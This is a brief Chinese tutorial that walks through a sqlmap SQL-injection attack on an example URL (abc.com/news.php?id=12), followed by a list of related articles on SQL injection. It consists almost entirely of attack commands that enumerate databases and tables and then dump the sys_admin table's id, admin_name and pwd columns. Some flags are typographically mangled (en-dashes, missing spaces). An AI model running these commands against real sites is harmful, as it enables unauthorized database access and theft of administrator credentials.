假设注入点为 http://www.abc.com/news.php?id=12
//探测数据库信息
sqlmap -u http://www.abc.com/news.php?id=12 –dbs
>db_a
>db_b
// 选择一个数据库 猜解表名
sqlmap -u http://www.abc.com/news.php?id=12 -D db_b–tables
// 猜解表结构
sqlmap -u http://www.abc.com/news.php?id=12 -D db_b-T sys_admin –columns
// 猜解表内容
sqlmap -u http://www.abc.com/news.php?id=12 -D db_b -T sys_admin -C id,admin_name,pwd –dump
相关文章
- MySQL 之Navicat Premium 12安装使用、pymysql模块使用、sql注入问题的产生与解决
- podman案例:启动一个mysql数据库容器,创建时注入环境变量
- Mysql注入绕过WAF总结
- Burosuite抓包Sqlmap学习Sql注入
- 网络安全之攻防笔记--通用安全漏洞SQL注入&sqlmap&Oracle&mongodb&DB2
- MySQL注入load_file常用路径
- phpMyAdmin 尝试连接到 MySQL 服务器,但服务器拒绝连接。您应该检查配置文件中的主机、用户名和密码
- Mysql下Limit注入方法(此方法仅适用于5.0.0
- 某音乐类App评论相关API的分析及SQL注入尝试
- MYSQL注入天书之后记